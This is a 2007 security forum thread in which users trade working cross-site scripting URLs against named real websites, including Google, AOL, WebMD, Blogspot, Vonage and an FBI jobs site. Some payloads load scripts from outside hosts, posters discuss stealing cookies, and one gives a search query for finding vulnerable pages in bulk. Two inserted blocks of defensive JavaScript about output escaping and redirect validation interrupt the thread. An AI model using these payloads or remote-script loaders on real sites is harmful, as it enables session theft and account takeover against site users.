Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 36 of 65
Re: So it begins
Posted by: Luny
Date: January 12, 2007 02:32AM

maluc Wrote:
-------------------------------------------------------
> from Luny's disclosure under Redirect's Edition
>
> http://www.webmd.com/click2.asp?redirect=javascript:alert('XSS')
>
> it's a meta redirect
>
> -maluc

Nice maluc. Also, I wanted to mention that a few months back I found a few XSS vulns on their forums too when posting new threads. Here's one vector:


<img src=javascript:alert(&#x27;xss&#x27;)>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: eyeced
Date: January 12, 2007 11:36AM

http://www.google.com/support/pack/?hl=en&gl=hk%27%29;alert(document.cookie);//

Can also be used for gmail, nice find hong!

Re: So it begins
Posted by: Ghozt
Date: January 12, 2007 02:05PM

http://base.google.com/base/s2?a_n0=%3Cscript%3Ealert('XSS')%3C/script%3E&a_y0=9&hl=en&gl=US



Edited 1 time(s). Last edit at 01/12/2007 02:27PM by Ghozt.

Re: So it begins
Posted by: Ghozt
Date: January 12, 2007 04:13PM

I'm pretty sure I can make a persistent XSS in Google, I just need to mess around with it a little.

What a waste of time.. just a regular XSS in Google profiles, and ftp://uploads.google.com doesn't accept HTML files. :(



Edited 1 time(s). Last edit at 01/12/2007 05:10PM by Ghozt.

Re: So it begins
Posted by: alf
Date: January 12, 2007 06:40PM

Some XSS out of my golden box...

Yeah, my penis is very long ;-)

http://joblo.com/tellafriend.php?id=14018'%22%3E%3Cscript%20src=http://mybeNi.rootzilla.de/mybeNi/xw.js%3E%3C/script%3E

Wah, I've got loads of beautiful XSS but I don't really want to disclose them :(

Re: So it begins
Posted by: unsticky
Date: January 12, 2007 07:00PM

http://aolmobile.aol.com/portal/regWidget.jsp?popup=%22%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E

More on aol.

Re: So it begins
Posted by: Hong
Date: January 13, 2007 02:46AM

http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?xss=%22%29;alert%28%22xss%22%29;//

It works on IE.

- Hong

Re: So it begins
Posted by: Hong
Date: January 13, 2007 03:45AM

Hong Wrote:
-------------------------------------------------------
> http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?xss=%22%29;alert%28%22xss%22%29;//
>
> It works on IE.

A new one.
http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?hl=zh_TW%5cx22%5cx3e%5cx3c/iframe%5cx3e%5cx3cscript%5cx3ealert(%5cx27xss%5cx27)%5cx3c/script%5cx3e
This also works on Firefox.
The previous one uses "); to end the document.write, so it needs the redirection to replace %22 with ", and it only works on IE; Firefox won't work because it doesn't replace %22 with ".
This one just lets document.write write our XSS vector, and Firefox replaces %5c with \.

- Hong

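An added example of the mechanism Hong describes above (my code, not anything from the thread or from Google): a value that lands inside a JavaScript string literal in a document.write() call is decoded by the JS engine before it is written, so escaping only the quote character does nothing against \x22-style escapes once the browser has turned %5c into a backslash. The server template, the function names and the stand-in document object are hypothetical; the payload is constructed from the one in the post. The hardened version percent-encodes for the URL context first and then escapes every non-alphanumeric character, backslash included, for the JS string context.

```javascript
// Hypothetical naive server: escapes double quotes in the parameter but
// passes backslashes through, so JS escape sequences survive intact.
function naiveScript(hl) {
  const escaped = hl.replace(/"/g, '\\"');
  return 'document.write("<iframe src=\\"/tcbin/tc.py?hl=' + escaped + '\\"></iframe>");';
}

// Escape every character outside [A-Za-z0-9] as \uXXXX. The attacker's
// own backslashes become \u005c, so nothing they send is an escape anymore.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hardened server: encode inside-out, URL context first, then JS string.
function safeScript(hl) {
  const value = jsStringEscape(encodeURIComponent(hl));
  return 'document.write("<iframe src=\\"/tcbin/tc.py?hl=' + value + '\\"></iframe>");';
}

// Run the generated script against a stand-in document so this works in
// Node; the engine parses the string literal exactly as a browser would.
function runScript(src) {
  const written = [];
  new Function("document", src)({ write: (html) => written.push(html) });
  return written.join("");
}

// Constructed payload: what the server sees after %5c has become "\".
// It contains no quote character, so the naive filter has nothing to
// escape, yet the engine decodes \x22 to ", \x3e to > and \x3c to <.
const PAYLOAD =
  "\\x22\\x3e\\x3c/iframe\\x3e\\x3cscript\\x3ealert(\\x27xss\\x27)\\x3c/script\\x3e";

// Returns what each server variant actually writes into the page.
function demo() {
  return {
    naive: runScript(naiveScript(PAYLOAD)),
    safe: runScript(safeScript(PAYLOAD)),
  };
}

console.log(demo());
```

The naive variant writes a closed iframe followed by a live script element; the hardened variant writes an iframe whose src merely carries the percent-encoded junk. The IE-only variant in the earlier post is the same class of bug with a different decoding step (IE turning %22 back into a quote), and the same inside-out encoding closes it.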
Re: So it begins
Posted by: SystemOfAHack
Date: January 13, 2007 08:06AM

Good find Hong. One of the only bad things to note is that it won't work if you're logged in to a gmail/google account; I imagine this devalues cookie stealing using this vector, might be wrong though.

Re: So it begins
Posted by: jungsonn
Date: January 13, 2007 08:32AM

Mkay Hong, but does it only allow an alert, or also .js insertions?

Re: So it begins
Posted by: r0xes
Date: January 14, 2007 04:07PM

I got kinda bored, and was downloading movie clips for some music, and voila!
http://www.moviewavs.com/php/sounds/?id=bst&media=WAVS&type=Movies&movie=%22%20onmouseover=alert(&quote=wolverines.txt&file=xss/);%3E%3Ctextarea%20style='visibility:%20hidden;'%3E.wav

Yeah, I was that bored.
There are way more in this site ^.^

lawlerskates and lmao missielz
http://www.r0xes.net / http://www.7na.org

Re: So it begins
Posted by: rsnake
Date: January 14, 2007 07:16PM

After reading this: http://www.sap.info/index.php4?ACTION=noframe&url=http://www.sap.info/public/INT/int/index/Category-28943c61b1e60d84b-int/0/articlesVersions-624545865ebc042ac

I found this: http://www.sap.info/index.php4?ACTION=noframe&url=javascript:alert(%27XSS%27%29

- RSnake
Gotta love it. http://ha.ckers.org

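The sap.info case above, like the webmd and netscape ones in this thread, is a redirect parameter that accepts a javascript: URL. As an added example (mine, not SAP's, WebMD's or Netscape's code), here is why a prefix check on the literal string "javascript:" is not a fix, and what a validator that reuses the browser's own URL parser looks like. The site origin, the function names and the probe list are constructed for the example; the WHATWG URL parser (the global URL class in Node and browsers) strips tabs, newlines and leading whitespace and lowercases the scheme, which is exactly what lets the variants slip past a string match.

```javascript
// Assumed origin of the page doing the redirect (hypothetical).
const SITE = "https://www.sap.info/";

// What a naive filter does: reject the literal prefix only. Mixed case,
// a leading tab, an embedded newline, or a different dangerous scheme
// all pass, and the browser still runs them.
function naiveIsSafeTarget(target) {
  return target.indexOf("javascript:") !== 0;
}

// Parse the target the way the browser will, then allow only http(s),
// optionally pinned to our own host. Anything unparsable is rejected.
function isSafeTarget(target, sameHostOnly = false) {
  let u;
  try { u = new URL(target, SITE); } catch (e) { return false; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return false;
  if (sameHostOnly && u.host !== new URL(SITE).host) return false;
  return true;
}

// Emit the meta refresh only for a validated target, attribute-encoding
// the resolved URL before it goes into the tag.
function buildMetaRefresh(target) {
  if (!isSafeTarget(target)) {
    throw new Error("refusing redirect to " + JSON.stringify(target));
  }
  const href = new URL(target, SITE).href.replace(/[&"<>]/g,
    (c) => ({ "&": "&amp;", '"': "&quot;", "<": "&lt;", ">": "&gt;" }[c]));
  return '<meta http-equiv="refresh" content="0;url=' + href + '">';
}

// Constructed probes: the thread's payload plus variants a prefix check misses.
const PROBES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert(1)",
  "\tjavascript:alert(1)",
  "java\nscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "https://www.sap.info/public/INT/int/index",
  "/public/INT/int/index",
];

// Side-by-side verdicts: true means the target would be allowed.
function evaluateProbes() {
  return PROBES.map((p) => ({
    target: p,
    naive: naiveIsSafeTarget(p),
    strict: isSafeTarget(p),
  }));
}

console.table(evaluateProbes());
```

The table shows the prefix check letting four of the five hostile probes through while the parser-based check admits only the two http(s) targets. The same validator applies whether the redirect is a meta refresh, a Location header or a JavaScript location assignment, since all three hand the string to the same URL parser.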
Re: So it begins
Posted by: malorn
Date: January 14, 2007 09:11PM

This one is pretty funny considering the domain name ;)

http://wwww.unsecured-systems.com/%3C/title%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E.cfm?pt=2&vid=1168830594_1X01X539023189&rpt=3&kt=1

Re: So it begins
Posted by: malorn
Date: January 14, 2007 09:26PM

pretty popular website

http://www.friendster.com/usersearch.php?search=1&country=US&usearch=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: rsnake
Date: January 14, 2007 09:59PM

http://www.netscape.com/viewstory/2007/01/09/sealand-for-sale-worlds-smallest-country-and-most-secure-data-center/?url=javascript:alert%28%22%58%53%53%22%29

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/14/2007 10:00PM by rsnake.

Re: So it begins
Posted by: Hong
Date: January 15, 2007 02:02AM

SystemOfAHack
Oh, I don't know that it won't work if you're logged in.
It seems that cookie stealing using this vector only works if Google doesn't change the cookie after the user logs out.

- Hong

Re: So it begins
Posted by: Hong
Date: January 15, 2007 02:57AM

jungsonn
You can do a js insertion. Here it is:
http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?hl=%5cx22%5cx3e%5cx3c%5cx2fiframe%5cx3e%5cx3cscript%5cx20src%5cx3dhttp%5cx3a%5cx2f%5cx2fha.ckers.org%5cx2fxss.js%5cx3e%5cx3c%5cx2fscript%5cx3e

- Hong

Re: So it begins
Posted by: unsticky
Date: January 15, 2007 09:18AM

http://yellowpages.aol.com/main.adp?_dirph1=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph2=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph3=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirpid=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirquery=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dircat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_diraddress=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&&_dirzip=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dircity=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirstate=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirlat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirlong=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirdma=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dby=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirnamesearch=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_diraction=phone&brand=aolyp

Re: So it begins
Posted by: Spikeman
Date: January 16, 2007 01:51AM

http://www.anagramgenius.com/server.php?source_text=%3Cscript+src%3Dhttp%3A%2F%2Fckers.org%2Fs%3E%3C%2Fscript%3E

http://www.anagramgenius.com/server.php?errormsg=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

Re: So it begins
Posted by: jungsonn
Date: January 16, 2007 06:05AM

Hong Wrote:
-------------------------------------------------------
> jungsonn
> You can do a js insertion. Here it is:
> http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?hl=%5cx22%5cx3e%5cx3c%5cx2fiframe%5cx3e%5cx3cscript%5cx20src%5cx3dhttp%5cx3a%5cx2f%5cx2fha.ckers.org%5cx2fxss.js%5cx3e%5cx3c%5cx2fscript%5cx3e


Very smart Hong! that's more like it!

Re: So it begins
Posted by: Luny
Date: January 16, 2007 09:22PM

http://www.crimelibrary.com/features/fea_printPage.asp?curPage=&thisFile=<script>alert('xss')</script>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: eyeced
Date: January 17, 2007 04:56PM

http://kuza55.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E

Lol, sorry Kuza. I was looking for the article about AJAX on your blog; I searched for it and instinctively included an <. I checked the source and saw that it wasn't filtered, one thing led to another and here it is...

I know the site isn't owned by you, so it's not really your problem; more of a generic Blogspot issue, I would have thought, although I haven't used and don't use Blogspot, so I'm not 100% on that.

Re: So it begins
Posted by: maluc
Date: January 17, 2007 06:06PM

Well, the only Blogspot I go to, http://jeremiahgrossman.blogspot.com, isn't affected... so I wonder if it's a bug in the particular theme kuza uses? Either way, it's a nice find. I don't have a blog there so I can't check whether it's able to access its authentication cookies or not.

anyway, very good find.

-maluc

Re: So it begins
Posted by: rsnake
Date: January 17, 2007 06:47PM

That is a good find! I'd like to know the answer to that.... that could affect a lot of people negatively, depending on how pervasive the theme is.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: January 17, 2007 07:57PM

I just tested kuza55's find on a number of Blogspot domains and it worked on all of them (except one, which 404s on the search page).


http://abcand123okinawa.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E
http://iambenyouarenot.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E
http://eunice517.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E

Googledork:
http://www.google.com.au/search?hl=en&q=site%3Ablogspot.com%2Fsearch%3Fq&btnG=Google+Search&meta=

> Results 1 - 10 of about 160,000

rsnake - this isn't related to a theme. It appears to be a Blogger issue.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 01/17/2007 08:04PM by digi7al64.

Re: So it begins
Posted by: luckymurari
Date: January 18, 2007 01:16AM

http://www.altavista.com/web/results?itag=ody&q=%3Csccript%3Ealert%28document.cookie%29%3C%2Fscript%3E&kgs=1&kls=0


It may not be a full-fledged vulnerability, but I think it's a vulnerability at least... if I search for a wrong string, and the string it suggests is a script, it gets executed... maybe we can craft URLs using this and bomb them on their site.

Re: So it begins
Posted by: Lockdown
Date: January 18, 2007 01:17AM

https://fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert('xss');%3C/script%3E

Seriously. No filtering. Whatsoever. At all.

Re: So it begins
Posted by: malorn
Date: January 18, 2007 02:14AM

Lockdown Wrote:
-------------------------------------------------------
> https://fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert('xss');%3C/script%3E
>
> Seriously. No filtering. Whatsoever. At all.

Originally posted on milw0rm by Easy; good find nonetheless.

Re: So it begins
Posted by: malorn
Date: January 18, 2007 02:52AM

http://vonage.com/search_results_gsa.php?search_string=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search.x=0&search.y=0

Thought I'd start looking at Alexa's top 100.

Re: So it begins
Posted by: malorn
Date: January 18, 2007 03:00AM

http://www.tigerdirect.com/applications/email/d_error.asp?email=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&listcode=MH&p=
